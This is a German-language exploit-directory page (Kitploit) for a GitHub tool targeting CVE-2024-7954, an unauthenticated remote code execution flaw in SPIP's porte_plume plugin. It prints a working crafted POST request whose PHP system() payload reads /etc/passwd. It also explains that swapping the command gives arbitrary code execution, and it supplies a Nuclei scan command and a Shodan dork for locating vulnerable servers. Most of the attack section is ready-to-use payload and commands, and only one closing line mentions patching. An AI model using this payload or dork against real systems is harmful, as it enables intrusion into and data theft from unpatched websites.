Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
RCE-CVE-2024-7954 — Exploit für CVE-2024-7954: Remote Code Execution im porte_plume-Plugin von SPIP. Enthält Nuclei-Scan-Vorlage und Shodan-Dork zur Identifizierung verwundbarer Instanzen. | Kitploit
Tools/GitHubGitHub/arthikw3b/rce-cve-2024-7954
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubarthikw3b/rce-cve-2024-7954

RCE-CVE-2024-7954

Exploit für CVE-2024-7954: Remote Code Execution im porte_plume-Plugin von SPIP. Enthält Nuclei-Scan-Vorlage und Shodan-Dork zur Identifizierung verwundbarer Instanzen.

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

RCE-CVE-2024-7954

Beschreibung

Das porte_plume-Plugin, das von SPIP-Versionen vor 4.30-alpha2, 4.2.13 und 4.1.16 verwendet wird, ist anfällig für eine kritische willkürliche Codeausführung (RCE)-Schwachstelle. Dieser Fehler ermöglicht es einem entfernten, nicht authentifizierten Angreifer, beliebigen PHP-Code als SPIP-Benutzer auszuführen, indem er eine spezielle HTTP-Anfrage erstellt. Das Ausnutzungspotenzial ist schwerwiegend, da Angreifer bösartige Befehle auf dem Server ausführen können, was zu unbefugtem Zugriff, Datenlecks oder weiterer Systemkompromittierung führen kann.

Details der Schwachstelle

  • Betroffene Software: SPIP (vor Versionen 4.30-alpha2, 4.2.13 und 4.1.16)
  • Art der Schwachstelle: Remote Code Execution (RCE)
  • Schweregrad: Kritisch
  • Ausnutzbarkeit: Entfernte, nicht authentifizierte Angreifer können diese Schwachstelle ausnutzen.

Exploit

##Nuclei Scan

root@kitploit:~
kali@Dell:~/nuclei-templates-main/http/cves/2024$ nuclei -l targets -t /home/kali/nuclei-templates-main/http/cves/2024/CVE-2024-7954.yaml





Ein Beispiel einer manipulierten HTTP-Anfrage, die zur Ausnutzung dieser Schwachstelle verwendet werden kann, lautet wie folgt:

root@kitploit:~
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}} -> IP
Content-Type: application/x-www-form-urlencoded

data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB

Erklärung des Exploits:

  • Die POST-Anfrage ist an die porte_plume_previsu-Aktion der SPIP-Datei index.php gerichtet.
  • Der data-Parameter enthält eine Nutzlast, die die PHP-Funktion system() verwendet, um einen Befehl auszuführen (in diesem Fall cat /etc/passwd), der den Inhalt der Passwortdatei liest.
  • Durch Ändern des Befehls innerhalb der system()-Funktion könnte ein Angreifer beliebigen PHP-Code auf dem Server ausführen, was zu schwerwiegenden Konsequenzen führt.

Shodan Dork

Um potenziell anfällige SPIP-Installationen zu identifizieren, kann die folgende Shodan-Suchabfrage verwendet werden:

root@kitploit:~
app="SPIP"

Diese Schwachstelle unterstreicht die Bedeutung, Software auf dem neuesten Stand zu halten und robuste Sicherheitsmaßnahmen zu implementieren, um sich vor Ausnutzung zu schützen.

Tool herunterladen